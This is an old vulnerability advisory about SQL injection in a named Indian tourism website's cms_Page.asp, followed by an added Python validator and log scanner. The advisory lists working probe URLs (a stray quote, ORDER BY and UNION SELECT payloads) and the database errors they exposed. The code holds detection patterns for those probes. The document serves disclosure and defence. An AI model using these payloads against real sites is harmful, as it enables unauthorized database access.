SQL Injection in incredibleindia.org
Vulnerable Page: http://www.incredibleindia.org/newsite/cms_Page.asp
Found By: Susam Pal
Found On: 29th March, 2006, Wednesday
Vulnerability Type: SQL Injection
Action Taken: Reported to admin@xxxxxxxxxxxxxxxxxxx
Description:
www.incredibleindia.org is a tourism website. The site is prone to SQL injection, which can be exploited to reveal table names, some column names and their data types. Exploiting the vulnerability requires some reverse engineering: the ASP page returns the raw ODBC error messages to the client when bad values are passed for the parameters in the URL, and those messages leak the query structure.
Example URL 1: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828'
Error Found: Unclosed quotation mark before the character string ' and mncpage.mnccategoryid = mnccategory.mnccategoryid'.
Conclusion: Direct SQL Injection is possible. There are 2 tables, 'mncpage' and 'mnccategory'. Both of them have a column called 'mnccategoryid'.
Example URL 2: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 1--
Example URL 3: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 2--
Example URL 4: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 3--
Error Found: None
Example URL 5: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 4--
Error Found: The ORDER BY position number 4 is out of range of the number of items in the select list.
Conclusion: The query selects 3 columns from the table, and one of them is an integer.
Example URL 6: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 union select 'varchar1', 'varchar2', 'varchar3' from mncpage--
Error Found: Syntax error converting the varchar value 'varchar1' to a column of data type int.
Conclusion: The 1st column in the select query is an integer.
Example URL 7: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 union select mnccategoryid, 'varchar2', 'varchar3' from mncpage--
Error Found: None
Conclusion: The column 'mnccategoryid' is of integer type.
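The probes above all share one root cause: PageID, which the page only ever uses as an integer, reaches the SQL string unvalidated, and the ODBC error text is echoed back to the client. The following is an added example, not code from the advisory or from the incredibleindia.org site, showing the two defensive pieces a practitioner would want for this pattern: a strict server-side validator for PageID, and a detector that replays the probe shapes seen in the advisory (stray quote, ORDER BY n--, UNION SELECT) over IIS W3C-style log lines. The hostname and path come from the advisory; the log lines, client addresses, timestamps and the assumption that PageID maps to a SQL Server int column are constructed for the example.

```python
"""Added example: input validation and log-based detection for the
cms_Page.asp?PageID=... injection pattern. Not the site's own code."""
import re
from urllib.parse import unquote_plus

# Assumption: PageID is a SQL Server int column, so this is the largest legal value.
MAX_PAGE_ID = 2_147_483_647


def validate_page_id(raw):
    """Return PageID as an int, or None unless it is a plain positive integer.
    Anything else (quotes, keywords, comment markers) never reaches SQL."""
    if raw is None:
        return None
    s = raw.strip()
    if not re.fullmatch(r"[0-9]{1,10}", s):
        return None
    value = int(s)
    if value < 1 or value > MAX_PAGE_ID:
        return None
    return value


# Probe shapes visible in the advisory's example URLs, matched on the decoded value.
PROBE_PATTERNS = {
    "stray_quote": re.compile(r"'"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.IGNORECASE),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.IGNORECASE),
    "comment_terminator": re.compile(r"--|/\*"),
}


def classify_query_value(raw_value):
    """Return the probe labels that match a URL-decoded parameter value."""
    decoded = unquote_plus(raw_value)
    return [name for name, pat in PROBE_PATTERNS.items() if pat.search(decoded)]


# IIS W3C fields assumed here: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
LOG_LINE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)

# Constructed sample log; the query values mirror the probes in the advisory.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2006-03-29 10:15:01 203.0.113.5 GET /newsite/cms_Page.asp PageID=828 200",
    "2006-03-29 10:15:09 203.0.113.5 GET /newsite/cms_Page.asp PageID=828' 500",
    "2006-03-29 10:15:20 203.0.113.5 GET /newsite/cms_Page.asp PageID=828%20order%20by%204-- 500",
    "2006-03-29 10:15:31 203.0.113.5 GET /newsite/cms_Page.asp "
    "PageID=828%20union%20select%20'varchar1','varchar2','varchar3'%20from%20mncpage-- 500",
    "2006-03-29 10:16:02 198.51.100.7 GET /newsite/cms_Page.asp PageID=abc 200",
]


def scan_iis_log(lines):
    """Return (client_ip, uri_stem, decoded_page_id, labels) for every request
    whose PageID fails validate_page_id(); labels name the matched probe shapes."""
    hits = []
    for line in lines:
        if line.startswith("#"):
            continue
        m = LOG_LINE.match(line.strip())
        if not m or m.group("query") == "-":
            continue
        params = {}
        for part in m.group("query").split("&"):
            key, _, value = part.partition("=")
            params[key] = value
        raw = params.get("PageID")
        if raw is None:
            continue
        decoded = unquote_plus(raw)
        if validate_page_id(decoded) is not None:
            continue
        labels = classify_query_value(raw) or ["non_integer"]
        hits.append((m.group("ip"), m.group("stem"), decoded, labels))
    return hits


if __name__ == "__main__":
    for ip, stem, value, labels in scan_iis_log(SAMPLE_LOG):
        print(f"{ip} {stem} PageID={value!r} -> {', '.join(labels)}")
```

In the classic ASP page itself the equivalent fix is to bind PageID as an integer parameter through ADODB.Command rather than concatenating it into the query text, and to stop sending database error text to the browser; the validator above is the layer that rejects the malformed values before they are ever bound, and the log scan is what surfaces the ORDER BY and UNION enumeration sequence shown in this advisory.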